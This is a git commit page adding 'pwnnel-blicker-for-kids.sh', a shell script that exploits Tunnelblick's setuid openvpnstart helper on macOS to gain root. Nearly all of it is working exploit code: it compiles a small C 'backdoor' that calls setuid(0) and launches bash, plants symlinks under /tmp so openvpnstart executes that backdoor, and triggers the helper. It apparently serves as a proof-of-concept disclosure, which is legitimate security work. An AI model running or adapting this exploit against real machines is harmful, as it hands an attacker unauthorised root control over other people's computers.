diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-11 17:00:56 +0200 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-11 17:00:56 +0200 |
commit | 059cdebb2d51944881dd24e862f9e40b249ee0a6 (patch) | |
tree | aab2dad25534048cf8868377184e5e653fc52db2 /pwnnel-blicker-for-kids.sh | |
parent | What's the damn program called again? (diff) | |
download | Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.tar.xz Pwnnel-Blicker-059cdebb2d51944881dd24e862f9e40b249ee0a6.zip |
An easy shell script.
Diffstat (limited to 'pwnnel-blicker-for-kids.sh')
-rwxr-xr-x | pwnnel-blicker-for-kids.sh | 28 |
1 files changed, 28 insertions, 0 deletions
diff --git a/pwnnel-blicker-for-kids.sh b/pwnnel-blicker-for-kids.sh new file mode 100755 index 0000000..bc1a336 --- /dev/null +++ b/pwnnel-blicker-for-kids.sh @@ -0,0 +1,28 @@ +#!/bin/sh +echo "[+] Making vulnerable directory." +mkdir -pv /tmp/pwn/openvpn/openvpn-0 + +echo "[+] Preparing payload." +cat > /tmp/pwn/backdoor.c <<_EOF +#include <unistd.h> +#include <sys/stat.h> +#include <stdio.h> + +int main() +{ + printf("[+] Cleaning up.\n"); + system("rm -rfv /tmp/pwn"); + printf("[+] Getting root.\n"); + setuid(0); + setgid(0); + execl("/bin/bash", "bash", NULL); +} +_EOF +gcc -o /tmp/pwn/root /tmp/pwn/backdoor.c + +echo "[+] Creating symlinks." +ln -s -v -f /tmp/pwn/root /tmp/pwn/openvpn/openvpn-0/openvpn +ln -s -v -f /Applications/Tunnelblick.app/Contents/Resources/openvpnstart /tmp/pwn/start + +echo "[+] Triggering vulnerable program." +exec /tmp/pwn/start OpenVPNInfo 0 |